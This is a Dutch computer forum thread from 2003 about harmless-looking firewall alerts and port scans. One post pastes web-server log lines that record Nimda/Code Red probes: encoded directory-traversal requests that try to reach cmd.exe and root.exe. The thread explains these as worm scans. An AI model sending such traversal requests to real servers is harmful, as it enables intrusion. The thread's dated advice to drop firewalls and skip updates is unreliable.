... je krijgt een hackpoging... en dan

Pagina: 1
Acties:

  • veryip
  • Registratie: Maart 2001
  • Laatst online: 15:50

veryip

Nikon D7000 + Glas

Topicstarter
Kreeg een hackpoging vandaag... gelukkig firewall etc.

Maar dan... waarom IK?? Doe toch echt niets bijzonders op internet :S

Ging hierom:

Details: Intrusion: Invalid TCP Flags
Intruder: 148.63.140.97
Risk Level: Medium
Source IP address: 148.63.140.97
Destination IP address: #########
TCP Source Port: 3814
TCP Destination Port: 1852
TCP Flags invalid: 0x00000914.

Moet ik dan nog actie ondernemen... gewoon hopen dat ie nooit weer komt of...

HELP

Nikon D7000


Verwijderd

Dit is geen hackpoging. Het is hooguit even aankloppen om te kijken of je hackbaar bent, niets meer.

Dit soort meldingen kun je gewoon negeren, je firewall heeft 't immers tegengehouden?

  • jelmervos
  • Registratie: Oktober 2000
  • Niet online

jelmervos

Simple user

Echt weer zo'n bericht van iemand die er zeer weinig van begrijpt en in diverse bladen leest dat een firewall eigenlijk verplicht is, maar zelf niet een weet waarom hij een firewall draait en hoe hacken in z'n werk gaat. Jammer.

[ Voor 26% gewijzigd door jelmervos op 11-01-2003 01:04 ]

"The shell stopped unexpectedly and Explorer.exe was restarted."


  • veryip
  • Registratie: Maart 2001
  • Laatst online: 15:50

veryip

Nikon D7000 + Glas

Topicstarter
... firwall is handig om ingaand en uitgaand verkeer van je comp te controleren.. zodat niet alles te pas en te onpas op het internet gaat en iedereen te pas en te onpas op mijn comp kan.... oid

Ben meer benieuwd waarom IK :S

Of is dit standaard iets wat iemand die weer eens zin heeft gewoon naar 1000 comps verzend en dan vervolgens hoopt dat er een paar "hackbaar" zijn

Krijg niet elke dag zo'n melding... heb ook geen idee waarom ik die zou moeten krijgen... vandaar... vraag ff

Nikon D7000


Verwijderd

Wen er maar aan.. :)

Er zijn heel veel kleine kindertjes die zich vervelen en dan maar hele ranges van IP-adressen gaan scannen.. doe je niets tegen, maar schaadt ook niet..

  • Bergen
  • Registratie: Maart 2001
  • Laatst online: 31-07 21:25

Bergen

Spellingscontroleur

Komt een beetje over alsof je ervan geschrokken bent... Het woord 'intruder' moet je ook met een zak zout nemen. Het is pas een intruder als hij echt binnen is gekomen toch? Dat issie blijkbaar niet want jij draait een firewall. (of het een goeie is weten we niet want je noemt de vuurmuur niet bij de naam)

DUDE, al krijg je 100 van dit soort dingen op een dag dan hoef je nog niet wakker van te liggen... Wen er maar aan enzo ;)

Kijk, stel dat jij IP-adres 213.93.104.118 hebt (ik noem maar een willekeurig adres uit een Chello-range) en ik zou van 213.93.104.1 tot 213.93.104.250 even een scan doen om te kijken of iemand iets achter poort 1852 heeft staan wat uitnodigt tot inbraak, dan betekent dat toch niet dat ik specifiek achter JOU aan zit? Ik zou dan gewoon toevallig OOK langs JOUW pjoeter komen tijdens de scan. Niets bijzonders dus en -zelfs- niet eens verboden.

Verwijderd

Tja kan gebeuren he

  • Ramon
  • Registratie: Juli 2000
  • Laatst online: 23:33
dit is waarschijnlijk een tooltje die een bepaalde exploit uittest op een range ip's. Degene die denkt lollig te zijn tikt gewoon in 213.42.1.101 t/m 213.42.254.254 bijvoorbeeld en dan scant dat tooltje automatisch al die ip's af en kijkt hoe de mogelijke slachtoffers reageren.

Check mijn V&A ads: https://tweakers.net/aanbod/user/9258/


  • jelmervos
  • Registratie: Oktober 2000
  • Niet online

jelmervos

Simple user

veryip schreef op 11 januari 2003 @ 01:14:
... firwall is handig om ingaand en uitgaand verkeer van je comp te controleren.. zodat niet alles te pas en te onpas op het internet gaat en iedereen te pas en te onpas op mijn comp kan.... oid
oid ja. Als jij op firewall niveau ingaand en uitgaand verkeer moet gaan regelen mag je wel es naar de configuratie van je internet software kijken. Als een PC goed geconfigureerd is is een firewall nagenoeg overbodig. Tenzij je compleet stealth wilt ofzo. Of als je bijvoorbeeld in bepaalde software pakketten niet kan aangezen op welke interface ze moet luisteren maar gewoon maar op alle beschikbare (waar tussen ook het internet kan zitten) interfaces luisteren.

Firewall kan ook handig zijn voor logging (hoeveelheid dataverkeer e.d.) maar dit lijkt me niet de primaire functie van een firewall.

"The shell stopped unexpectedly and Explorer.exe was restarted."


  • veryip
  • Registratie: Maart 2001
  • Laatst online: 15:50

veryip

Nikon D7000 + Glas

Topicstarter
.... OK... 't is me duidelijk....

firewallsoftware: Norton Personal firewall 2003

Nikon D7000


Verwijderd

oid ja. Als jij op firewall niveau ingaand en uitgaand verkeer moet gaan regelen mag je wel es naar de configuratie van je internet software kijken. Als een PC goed geconfigureerd is is een firewall nagenoeg overbodig. Tenzij je compleet stealth wilt ofzo. Of als je bijvoorbeeld in bepaalde software pakketten niet kan aangezen op welke interface ze moet luisteren maar gewoon maar op alle beschikbare (waar tussen ook het internet kan zitten) interfaces luisteren.

Firewall kan ook handig zijn voor logging (hoeveelheid dataverkeer e.d.) maar dit lijkt me niet de primaire functie van een firewall.
Tsja, de eeuwenoude discussie..

feit is dat een goed geconfigureerde PC in handen van een n00b al snel een openstaande deur kan zijn (openen bijlages, virussen, etc). Dan kan een firewall nooit kwaad.

Verwijderd

........................................................................

clearleh they need to learn a lot :}

  • jep
  • Registratie: November 2000
  • Laatst online: 29-07 16:55

jep

Update je windows, uninstall die firewall en internet relaxed. Succes :)

  • jpiscaer
  • Registratie: Januari 2002
  • Laatst online: 22:58
jep schreef op 11 januari 2003 @ 01:40:
Update je windows, uninstall die firewall en internet relaxed. Succes :)
Nee dus. Een up-to-date versie van windows (incl. hotfixes) is niet echt nodig, behalve voor grote en belangrijke updates. Een firewall die je pc in stealth zet is echter wel nodig, ik krijg (als flink internetgebruiker) toch wel eens per dag een scan langs me deur, en aangezien windows netjes alle poorten open heeft staan (met uitzondering van NT based windows) is een firewall echt nodig. Een firewall doet trouwens niks aan emailattachments en backdoors, die blokt en logt het internetverkeer alleen maar.

Mijn ervaringen leren dat je altijd een windows met alle grote security updates moet hebbe, een goede firewall en een virusscanner (met updated referencefiles)...

  • IceStorm
  • Registratie: Februari 2000
  • Laatst online: 22:30

IceStorm

This place is GoT-like!!!

Een firewall is gewoon niet nodig imho. Ik heb er 2 jaar een gehad (meerdere zelfs) en het enige wat je te zien krijgt is wie er nu weer eens op poort xxx heeft lopen kloppen.
Een standaard XP install met updates is veilig genoeg als particulier (of iig, vind ik).

Een virusscanner is VEEL belangrijker.

  • jep
  • Registratie: November 2000
  • Laatst online: 29-07 16:55

jep

Jainoxi schreef op 11 January 2003 @ 01:47:
[...]


Nee dus. Een up-to-date versie van windows (incl. hotfixes) is niet echt nodig, behalve voor grote en belangrijke updates. Een firewall die je pc in stealth zet is echter wel nodig, ik krijg (als flink internetgebruiker) toch wel eens per dag een scan langs me deur, en aangezien windows netjes alle poorten open heeft staan (met uitzondering van NT based windows) is een firewall echt nodig. Een firewall doet trouwens niks aan emailattachments en backdoors, die blokt en logt het internetverkeer alleen maar.

Mijn ervaringen leren dat je altijd een windows met alle grote security updates moet hebbe, een goede firewall en een virusscanner (met updated referencefiles)...
Dan heb jij duidelijk andere ervaringen. Bij absolute newbies kan ik 't me voorstellen, zo'n firewall. Mits deze geen meldingen geeft natuurlijk. Als je weet waar je mee bezig bent is dit niet nodig, een virus scanner ook niet. Ik heb al 2 jaar geen virus meer gehad, en krijg ze er wel per mail. Gewoon opletten :).

  • IceStorm
  • Registratie: Februari 2000
  • Laatst online: 22:30

IceStorm

This place is GoT-like!!!

jep schreef op 11 January 2003 @ 01:58:
Dan heb jij duidelijk andere ervaringen. Bij absolute newbies kan ik 't me voorstellen, zo'n firewall. Mits deze geen meldingen geeft natuurlijk. Als je weet waar je mee bezig bent is dit niet nodig, een virus scanner ook niet. Ik heb al 2 jaar geen virus meer gehad, en krijg ze er wel per mail. Gewoon opletten :).

Een virusscanner vind ik dan nog net wel belangrijk, je hoeft maar een keer niet op te letten en het kan al raak zijn. Ik noem ouders/zusjes die met floppies rondlopen (nee vage attachments openen heb ik ze afgeleerd :P) enzo.
Je kunt iig prima zonder dat klopt, alleen moet je zonder virusscanner 'opletten' en zonder firewall gewoon niet express poorten gaan openen en roepen dat je onhackbaar bent op de verkeerde plaatsen :+.

  • jep
  • Registratie: November 2000
  • Laatst online: 29-07 16:55

jep

Inderdaad, firewalls zijn voor zusjes :+.

  • Bergen
  • Registratie: Maart 2001
  • Laatst online: 31-07 21:25

Bergen

Spellingscontroleur

Conclusie: heb je geen irritant zusje in de buurt? Firewall + virusscanner overbodig! :) (oeh ik identificeer me :z)

  • Mentalist
  • Registratie: Oktober 2001
  • Laatst online: 31-07 19:29

Mentalist

[avdD]

Ik dacht er al een tijdje over er een topic over te openen maar het past hier wel bij...

Ik zat pas voor de gein m'n Apache logs te lezen (webservertje hier ja, en staat open naar het internet) en daar bleken een aantal verzoekjes naar CMD.exe in te staan... Met allemaal commando's enzo. Ook naar root.exe....

Hier een stukje uit de log, IP's heb ik ff weggehaald :

code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
[01/Jan/1998:06:00:22 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
[01/Jan/1998:06:00:22 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
[01/Jan/1998:06:00:23 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
[01/Jan/1998:06:00:23 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
[01/Jan/1998:06:00:23 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
[01/Jan/1998:06:00:23 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
[01/Jan/1998:06:00:24 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
[01/Jan/1998:06:00:24 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe
?/c+dir HTTP/1.0" 404 331
[01/Jan/1998:06:00:24 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
[01/Jan/1998:06:00:24 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
[01/Jan/1998:06:00:24 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
[01/Jan/1998:06:00:25 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
[01/Jan/1998:06:00:25 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
[01/Jan/1998:06:00:25 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
[01/Jan/1998:06:00:25 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
[01/Jan/1998:06:00:26 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
[01/Jan/1998:09:14:06 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
[01/Jan/1998:09:14:06 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
[01/Jan/1998:09:14:07 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
[01/Jan/1998:09:14:07 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
[01/Jan/1998:09:14:08 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
[01/Jan/1998:09:14:08 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
[01/Jan/1998:09:14:09 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
[01/Jan/1998:09:14:09 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe
?/c+dir HTTP/1.0" 404 331
[01/Jan/1998:09:14:09 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
[01/Jan/1998:09:14:10 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
[01/Jan/1998:09:14:10 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
[01/Jan/1998:09:14:11 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
[01/Jan/1998:09:14:11 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
[01/Jan/1998:09:14:11 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
[01/Jan/1998:09:14:11 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
[01/Jan/1998:09:14:12 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298

Sorry voor de layoutverneuking maar anders is het echt nauwelijks leesbaar

Heb ik smakelijk om gelachen aangezien die Apache onder Windows 95 draait :+

Hoop 404's uitgedeeld dus... Is dit ook zo'n routinescan? (hij komt vaker voor in m'n logs, vaak ook met steeds al die pogingen naar al die verschillende zooi)

Btw, niet over de datum zeiken, de cmos batterij is leeg :+

[ Voor 8% gewijzigd door Mentalist op 11-01-2003 04:08 ]

Verstuurd vanaf mijn Computer®


Verwijderd

LOL, je hebt een electronisch slot aangeschaft en nu ben je paranoide geworden van de melding van je beveiliging dat er iemand (toevallig/postbode/vogeltje etc) langs je sensor bewoog?

Dan lig je zeker ook nachten wakker als je IR-actieve buitenlamp aanspringt?

Het is pas hacken als ze door de deur naar binnen lopen (of er een breekijzer bij een poging gebruiken).
../winnt/system32/cmd.exe
LOL, idd, welke dropkever gaat uit van standaardmappen (%systemdir%\cmd.exe in 'hack'poging was al beter geweest), iedereen die enigszins verstandig is gebruikt geen defaults van installaties en al zeker geen systeemmap op default \Windows\System of \WinNt\System32....

Root.exe + CMD.exe = W32-Nimda / W32-CodeRed II worm

http://www.cert.org/advisories/CA-2001-26.html

[ Voor 39% gewijzigd door Verwijderd op 11-01-2003 04:25 ]


  • Bergen
  • Registratie: Maart 2001
  • Laatst online: 31-07 21:25

Bergen

Spellingscontroleur

Hmm... root.exe... test of er een rootkit (windows-rootkit? :X :+) op je pc zit?

  • Opa
  • Registratie: Januari 2000
  • Laatst online: 18:23

Opa

Nu Multifocaal!

GerbenW schreef op 11 January 2003 @ 04:21:
Hmm... root.exe... test of er een rootkit (windows-rootkit? :X :+) op je pc zit?
Root.exe is een cmd.exe die door Code Red gecopieerd is naar die directory...

http://securityresponse.s...venc/data/codered.ii.html

Hyundai ioniq Electric 8/2020 > Zeekr X Long Range 8/2024


  • Bergen
  • Registratie: Maart 2001
  • Laatst online: 31-07 21:25

Bergen

Spellingscontroleur

victorvo schreef op 11 januari 2003 @ 04:35:
[...]


Root.exe is een cmd.exe die door Code Red gecopieerd is naar die directory...

http://securityresponse.s...venc/data/codered.ii.html
* Bergen kijkt naar W3ird_N3rd en denkt: "Jij mag je server wel eens wat beter beveiligen :Y)"

  • Opa
  • Registratie: Januari 2000
  • Laatst online: 18:23

Opa

Nu Multifocaal!

GerbenW schreef op 11 januari 2003 @ 04:45:
[...]
* Opa kijkt naar W3ird_N3rd en denkt: "Jij mag je server wel eens wat beter beveiligen :Y)
Neuh...

Hij heeft al Apache draaien... Geen IIS.

Hyundai ioniq Electric 8/2020 > Zeekr X Long Range 8/2024


Verwijderd

Mag ik die plaatjes dir van je downloaden?
Ik vraag het ff bij voorbaat hoor :)

Verwijderd

Abonnee van de Computer Idee? :)

  • supakeen
  • Registratie: December 2000
  • Laatst online: 09-09-2025
Voor de topicstarter: Ik vind je puntjes nogal hinderlijk lezen :X

Ik heb zelf al 5 jaar geen firewall of virusscanner op mijn pc en er is eigenlijk nog nooit iets gebeurd :X

  • _JGC_
  • Registratie: Juli 2000
  • Laatst online: 21:45
Tja, hackpoging... ik ken iemand die ZoneAlarm heel erg scherp had ingesteld en vervolgens winroute lite installeerde. Belde ie me op:
"IK BEN GEHACKT!"
"Hoezo?"
"Dat zegt zonealarm, ik word aangevallen door 212.142.28.66 en 212.142.28.130 en ik kan niet meer internetten"
"Ow, dat zijn de DNS servers van sjello"
"Ja, die vallen mij aan"
"Heb je iets vaags geinstalleerd?"
"Ja, winroute lite"
"Ow, nix ernstigs, flikker die firewall maar weg, onzinspul"

Tis wat met die mensen die denken dat ze veel weten en dan bij het minste al roepen dat ze gehackt zijn :P

BTW: Zelf een iptables firewall met input policy op DROP, 24/7 server kan niet veilig genoeg zijn met al die zooi draaiend waar je geen zin in hebt om die veilig in te stellen :P

  • BlaTieBla
  • Registratie: November 2000
  • Laatst online: 18:18

BlaTieBla

Vloeken En Raak Schieten

zmn schreef op 11 January 2003 @ 11:02:
Voor de topicstarter: Ik vind je puntjes nogal hinderlijk lezen :X

Ik heb zelf al 5 jaar geen firewall of virusscanner op mijn pc en er is eigenlijk nog nooit iets gebeurd :X
Dat denk je... >:)

Anyway. Port 1852 zit in een 'unassigned' reeks. Best mogelijk, dat diegene opzoek was naar een backdoortje wat hij ooit eens een keer de wereld in gestuurd heeft....

leica - zeiss - fuji - apple | PSN = Sh4m1n0


  • ZaZ
  • Registratie: Oktober 2002
  • Laatst online: 07-07 01:04

ZaZ

Tweakers abonnee

Mjah, wat sommige hier zeggen ben ik het mee eens.
Je hoeft niet perse een firewall te hebben draaien om veilig te zitten.
Gooi die firewall eens uit en check of de 'standaard poorten' dichtzitten. Dat doe je bijv op moet ik met zorgen maken , maar er zijn er vele te vinden.
zegt zo'n test dat het wel ok zit met je veiligheid, dan hoef je je imho niet echt druk te maken. Hackers die ergens daar doorheenbreken willen ook altijd nog het resultaat zien omdat het dan toch enige moeite kost. Bijv een site die plat ligt oid. Je gaat niet lopen ploeteren dat je daarna iemand niet meer kan pingen bijv. daar is geen lol aan

Lekker op de bank


  • BlaTieBla
  • Registratie: November 2000
  • Laatst online: 18:18

BlaTieBla

Vloeken En Raak Schieten

ZaZ schreef op 11 January 2003 @ 11:28:
Mjah, wat sommige hier zeggen ben ik het mee eens.
Je hoeft niet perse een firewall te hebben draaien om veilig te zitten.
Gooi die firewall eens uit en check of de 'standaard poorten' dichtzitten. Dat doe je bijv op moet ik met zorgen maken , maar er zijn er vele te vinden.
zegt zo'n test dat het wel ok zit met je veiligheid, dan hoef je je imho niet echt druk te maken. Hackers die ergens daar doorheenbreken willen ook altijd nog het resultaat zien omdat het dan toch enige moeite kost. Bijv een site die plat ligt oid. Je gaat niet lopen ploeteren dat je daarna iemand niet meer kan pingen bijv. daar is geen lol aan
Die link zegt dus helemaal niets. Hij checkt een aantal standaard poorten. Bij mij werden de poorten 21, 25, 80, 110 en 443 gevonden. Dit zijn dus de well-known services.
Poorten die wel degelijk open staan en verkeer accepteren bij mij zijn:
20,21,22,25,80,110,443,3389,8080 en 8888. Dus zoek de verschillen.... duidelijk een portscan van lik me verstje.

Je kan het beste vanaf een ander station een portscan opstarten vanaf port 0 t/m 65000 [en een beetje] en dan eens kijken wat je zoal vindt.

[ Voor 8% gewijzigd door BlaTieBla op 11-01-2003 11:38 ]

leica - zeiss - fuji - apple | PSN = Sh4m1n0


  • NiGeLaToR
  • Registratie: Maart 2000
  • Laatst online: 23:41

NiGeLaToR

Luister Kophi Podcast!

Wacht maar tot ik je scan.. als je een tooltje gebruikt die ALLE poorten scant op alle zwakheden krijg je in ene 15000 meldingen van mij alleen al :)

Dat doe ik dus ook nooit, alleen voor me werk :) Want 'hacken'/poortscannen is gewoon iets wat een sysop regelmatig zou moeten doen op z'n eigen machines. Wel zo handig :)

KOPHI - Klagen Op Het Internet podcast. Luister hier! of kijk hier op YouTube.


  • ZaZ
  • Registratie: Oktober 2002
  • Laatst online: 07-07 01:04

ZaZ

Tweakers abonnee

BlaTieBla,

Het was een voorbeeld zoals ik al best wel duidelijk aangaf. Hij checkt gewoon idd een aantal standaard poorten (zoals ik ook al in mn post zei), en imho ben je dan al redelijk veilig, omdat al die standaard hacktooltjes op diezelfde poorten kijken. En ik verkondig ook niet dat als zo'n scan zegt dat het wel goed zit met je computer, dat dan je systeem helemaal waterdicht is. Ik zeg alleen dat je niet zo druk hoeft te maken dan. En zo'n uitgebreide poortenscan is natuurlijk niets op tegen want dan zie je meer idd.

Lekker op de bank


  • Mentalist
  • Registratie: Oktober 2001
  • Laatst online: 31-07 19:29

Mentalist

[avdD]

Verwijderd schreef op 11 januari 2003 @ 04:13:
[...]
LOL, idd, welke dropkever gaat uit van standaardmappen (%systemdir%\cmd.exe in 'hack'poging was al beter geweest), iedereen die enigszins verstandig is gebruikt geen defaults van installaties en al zeker geen systeemmap op default \Windows\System of \WinNt\System32....

Root.exe + CMD.exe = W32-Nimda / W32-CodeRed II worm

http://www.cert.org/advisories/CA-2001-26.html
Windows staat wel standaard in c:\windows geinstallt :)

Niet dat het veel voor deze "hackpoging" uitmaakte aangezien Windows 95 toch geen cmd.exe of root.exe kent 8)7
GerbenW schreef op 11 januari 2003 @ 04:21:
Hmm... root.exe... test of er een rootkit (windows-rootkit? :X :+) op je pc zit?
Hmm, een root.exe staat iig niet op de HD :)
Zal er dus wel niet opstaan :P (in Win95 ben je standaard toch altijd r00t, wat zou je dan met root shit moeten, Windows kent niet eens roots, dat heet admin :P)
victorvo schreef op 11 January 2003 @ 04:35:
[...]


Root.exe is een cmd.exe die door Code Red gecopieerd is naar die directory...

http://securityresponse.s...venc/data/codered.ii.html
Gelukkig staan er geen virussen op die machine :). Komen er ook niet op (mail lezen doe ik op een andere machine, in ascii, en iedereen die het hier in zijn/haar hoofd haalt rond te lopen met vage floppys stopt die niet in een computer die aan het netwerk hangt).
GerbenW schreef op 11 January 2003 @ 04:45:
[...]
* Mentalist kijkt naar W3ird_N3rd en denkt: "Jij mag je server wel eens wat beter beveiligen :Y) "
Ik draai geen MS iis zooi, heb geen virussen, en zit ook nog achter een Freesco router/firewall...

Mwah, valt wel mee denk ik. Win95 ziet er best goed uit, al die CMD.exe verzoekjes zijn netjes met 404 beantwoord :D

Maar is dit nou ook gewoon een routine klusje wat er langs m'n apache liep, en zou ik een echt risico lopen dat die machine gehackt word? Win95 gold (en ik ga _nooit_ naar windows update), Apache 1.3.26 + Php 4.2.3 achter een Freesco router/firewall...

Verstuurd vanaf mijn Computer®


Verwijderd

victorvo schreef op 11 januari 2003 @ 05:04:
[...]


Neuh...

Hij heeft al Apache draaien... Geen IIS.
Ik heb sinds vandaan een simpele webserver opgezet onder Windows XP Sp1. Nu heb ik dit gedaan door middel van IIS. Wat bedoel je precies met beter beveiligen in de zin van hoe krijg ik IIS dichter.

Zit achter router enige port die openstaat is 80.

Verwijderd

Valt best mee met en aanval. Ik krijg er wel eens tig duizend per dag met Blackice Defender. Het is al eens zo gek geweest dat ik door de aanvallen geen internet meer kon gebruiken omdat alle bandbreedte in gebruik was.
Ik heb vroeger ook vaak last gehad van overflows(weet de preciese naam niet meer). Is de PC al een paar keer door vastgelopen toen in en meer als 1400 snel achter elkaar kreeg. Toen had ik een PC naam als AMD 1000 toen deze net uit was. Nu heb ik gewoon Internetbak, MP3bak ed als namen en ik krijg maar een paar aanvallen per dag meer.

  • Bigs
  • Registratie: Mei 2000
  • Niet online
[HK Reply bij nader inzien maar verwijderd :) ]

[ Voor 115% gewijzigd door Bigs op 11-01-2003 19:17 ]


  • Pc123
  • Registratie: Oktober 2000
  • Laatst online: 22:56
Reken er maar op dat je de komende maanden nog veel meer meldingen zult krijgen, zijn gewoon mensen die systematisch grote ip ranges scannen op beveiligingslekken. En waarom jij? Omdat je een gebruiker van het internet bent, iedereen heeft wel ns zoiets, maar een fatsoenlijk beveiligde PC zonder firewall heeft er ook geen last van, gewoon security updates installaren, dat is belangrijker dan een firewall. Een firewall is vooral handig om te controleren welke programma's verbinding met het internet willen maken.

  • Resistor
  • Registratie: April 2001
  • Niet online

Resistor

Niet meggeren!

Als je firewall zijn werk maar doet.
Ik heb zelf ZoneAlarm geïnstalleerd, paar maanden geloof ik, en nu geeft de overview al aan:
340 intrusions have been blocked since install
22 of those have been high-rated

Een hoop programma's denk ik, die ik toch geen toegang geef tot het internet (windows media player bijvoorbeeld)

What will end humanity? Artificial intelligence or natural stupidity?


  • Bergen
  • Registratie: Maart 2001
  • Laatst online: 31-07 21:25

Bergen

Spellingscontroleur

victorvo schreef op 11 januari 2003 @ 05:04:
[...]


Neuh...

Hij heeft al Apache draaien... Geen IIS.
Dus? Als je Apache draait betekent dat niet meteen dat je waterdicht bent! Sommige oudere versies hebben ook beveiligingslekken! Maargoed, het ging hier om Code Red en dan is Apache niet van toepassing idd. :)
W3ird_N3rd schreef op 11 januari 2003 @ 18:51:
[...]
Hmm, een root.exe staat iig niet op de HD :)
Zal er dus wel niet opstaan :P (in Win95 ben je standaard toch altijd r00t, wat zou je dan met root shit moeten, Windows kent niet eens roots, dat heet admin :P)
Maar dat kent Win95 ook niet :)

  • Opa
  • Registratie: Januari 2000
  • Laatst online: 18:23

Opa

Nu Multifocaal!

Verwijderd schreef op 11 januari 2003 @ 19:05:
[...]


Ik heb sinds vandaan een simpele webserver opgezet onder Windows XP Sp1. Nu heb ik dit gedaan door middel van IIS. Wat bedoel je precies met beter beveiligen in de zin van hoe krijg ik IIS dichter.

Zit achter router enige port die openstaat is 80.
Houd in de gaten of er gaten in IIS of XP worden gevonden en welke fixes daarvoor uitgebracht worden. Zoek met Google naar de termen XP, IIS vulnerability (-ties), patch, update. Kijk regelmatig bij Windows update (de corporate versie) en installeer en run de Microsoft Baseline Security Analyzer. Blijf ze steeds een stap voor zogezegd. Je systeem kan dan wel dicht lijken, maar met updates en patches sluit je wel deuren waarvan je voordien niet wist dat je ze had, laat staan dat je wist dat ze wagenwijd open stonden.

Nog beter is het om een andere Web/FTP/mailserver te gebruiken, aangezien "John Q. Hacker" zich meestal richt op het massaproduct IIS... Denk aan Apache en GuildFTPd en zo.

Maar met een goed geconfigureerde firewall en een beetje gezonde achterdocht kom je ook al een heel eind inderdaad.

Hyundai ioniq Electric 8/2020 > Zeekr X Long Range 8/2024


  • jep
  • Registratie: November 2000
  • Laatst online: 29-07 16:55

jep

GerbenW schreef op 11 January 2003 @ 23:09:
[...]
Dus? Als je Apache draait betekent dat niet meteen dat je waterdicht bent! Sommige oudere versies hebben ook beveiligingslekken! Maargoed, het ging hier om Code Red en dan is Apache niet van toepassing idd. :)
Apache hack je niet door de URL wat te veranderen 8)7 B)

  • Bergen
  • Registratie: Maart 2001
  • Laatst online: 31-07 21:25

Bergen

Spellingscontroleur

jep schreef op 12 januari 2003 @ 11:47:
[...]

Apache hack je niet door de URL wat te veranderen 8)7 B)
Gelukkig niet nee... 8)7

Verwijderd

Verwijderd schreef op 11 January 2003 @ 01:15:
Wen er maar aan.. :)

Er zijn heel veel kleine kindertjes die zich vervelen en dan maar hele ranges van IP-adressen gaan scannen.. doe je niets tegen, maar schaadt ook niet..
" maar schaadt ook niet" : je moest eens weten wat ik al allemaal gezien heb.....toch lullig als je vriendin opeens op de desktop van iemand anders staat....

[ Voor 3% gewijzigd door Verwijderd op 12-01-2003 14:25 . Reden: typo ]


  • alt-92
  • Registratie: Maart 2000
  • Niet online

alt-92

ye olde farte

W3ird_N3rd schreef op 11 januari 2003 @ 18:51:
Maar is dit nou ook gewoon een routine klusje wat er langs m'n apache liep, en zou ik een echt risico lopen dat die machine gehackt word? Win95 gold (en ik ga _nooit_ naar windows update), Apache 1.3.26 + Php 4.2.3 achter een Freesco router/firewall...
Dit is (helaas) nog steeds een routine klusje. Logs lopen nog steeds over met nimda/code red scans, en dat is verdomme al anderhalf jaar oud nu :X :X

ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device


  • Attilla
  • Registratie: Februari 2001
  • Laatst online: 23-06-2021
Het is maar hoe je zelf met je pc omgaat en hoe paranoiede je bent.
Ik heb dit verhaaltje al een keer getypt, maar kan het niet terug vinden.

Als jij een standaard installatie heb, van welke OS ook en je zorgt dat je geen trojan's opend ben je gewoon veilig. Dit denk ik om de volgende reden:

1. Wie wil jou hacken en waarvoor ?

Inderdaad, wie zou jou nou willen hacken ?
Tjah ik denk dat je hier zelf al geen antwoord op kan geven.

Waarom ?
Om die CV die erop staat ?
Om die warez die op je pc staan ?

Mensen die in een standaard os kunnen inbreken, zijn opzich best goed. Als je geen extra software heb geinstalleerd en geen trojans heb geopend is het zelfs bijna onmogelijk. Op dit moment hou je alleen de mensen over die dit wel kunnen, en geloof me... die zijn echt niet geintresseert in wat jij op je pc heb. Dit hebben wel wat beters met een tijd te doen.

  • Fear-factoR
  • Registratie: Augustus 2001
  • Laatst online: 06-04-2022

Fear-factoR

catmonkey

voor de mensen die echt dieper in de materie rond hacken willen duiken zijn deze artikelen erg interessant... (het zijn wel flinke lappen text, maar je wordt er wel een stuk wijzer van)... XP is echt niet zo waterdicht als je zou denken

http://grc.com/dos/xpsummary.htm & http://grc.com/dos/winxp.htm
In the hands of a clueful hacker, fully-supported Raw Sockets is the enabling factor for the creation of a series of "Ultimate Weapons" against which the fundamentally trusting architecture of the global Internet currently has no effective defense.

Windows XP is the malicious
hacker's dream come true.
en dit artikel is ook erg interessant, over Distributed Reflection Denial of Service

